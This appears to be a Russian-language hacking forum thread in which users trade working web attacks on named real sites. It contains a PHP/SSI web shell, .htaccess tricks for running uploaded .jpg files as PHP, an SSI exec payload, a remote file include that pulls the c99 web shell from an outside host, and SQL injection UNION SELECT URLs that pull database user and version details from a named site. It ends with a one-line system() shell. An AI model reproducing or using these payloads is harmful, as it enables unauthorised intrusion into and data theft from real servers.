если можешь менять файл можешь через ccи попытатся https://forum.antichat.ru/showpost.php?p=568232&postcount=9 я написал себе этот маленкий шелл для этого PHP: <?php if ($handle = @fopen("./a.shtml", 'w')) { @fwrite($handle, '<!--#exec cmd="'.$_POST['a'].'"-->'); } echo '<form name="a" method="post" action=""> <textarea name="textarea" id="textarea" cols="121" rows="24"> '; @include("http://".$_SERVER['HTTP_HOST'].rtrim(dirname($_SERVER['PHP_SELF']),'/\\')."/a.shtml") ; echo ' </textarea><input type="text" name="a" id="a"><input name="input" type="submit"></form> '; ?>
Точнее можете расписать, что с этим делать? сси использовать как "перл"-файл? Для начала я засунул скрипты себе на хостинг, вашим скриптом воспользоваться не могу.
есть, пробывал Fetal Error или File edited successfully. и потом выплняю http://www.site.com/wp-admin/plugin-editor.php?file=get-recent-comments/get-recent-comments.php?cmd=ls пишет Sorry, that file cannot be edited. хотя файл сохранён
я как-то заливал так. в .htaccess дописывал Code: AddHandler application/x-httpd-php .jpg ищел в добовление новости, там было загрузить картинку, банально лил шелл с окончание jpg и все)
я забыл добавить .. так как на моём хосте всё в конфиге апача написано Надо создать файл .htaccess с содержанием Code: AddType text/html .shtml AddHandler server-parsed .shtml Options +Include дальше можешь запустить скрипт который я написал выше или же создать файл с расширением .shtml и написать в нём Code: <!--#exec cmd="ls -la"--> где ls -la команда которую ты хочешь выполнить на сервере и открыть его на сервере. пример www.site.ru/a.shtml
это уязвимость нзвается инклудом ч/з него иногда можно лит web-shell, вот юзай, например, это шелл, http://www.kat.kg/index.php?file=http://madnet.name/files/download/9_c99madshell.php
http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,database(),user(),version()),0x71),0x71),6,7/* что можно ещё нарыть ?
nicusor Там восемь столбцов _http://www.moldagrotehnica.md/index.php?newsid=-66+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),version(),char(58),database()),0x71),0x71),4,5,6,7,8/* agro@localhost:4.1.14:moldagrotehnica_md Подбирай таблицы если надо
там 7 столбцов 100% .. как подбирать ? http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,5,6,7+from+<table>/* где <table> самые распространенные имена, правильно?
nicusor Друг мой. Интересно зачем задавать вопрос, если не слушать ответа на него? Специально для тебя я привёл ссылку , пройдя по которой ты увидишь вывод из таблицы Правда в моей ссылке(как впрочем и в базе) полей 8 и если ты догадаешься убрать из неё пробелы будет гораздо проще
Пробывал залить шелл на этот сайт. Почему пишет Warning: system() [function.system]: Cannot execute a blank command in http://site.com/script.php on line 1 В скрипте обычный вызов функции систем().Пробывал с кавычками и без них) <?php system($_GET['cmd']); ?>
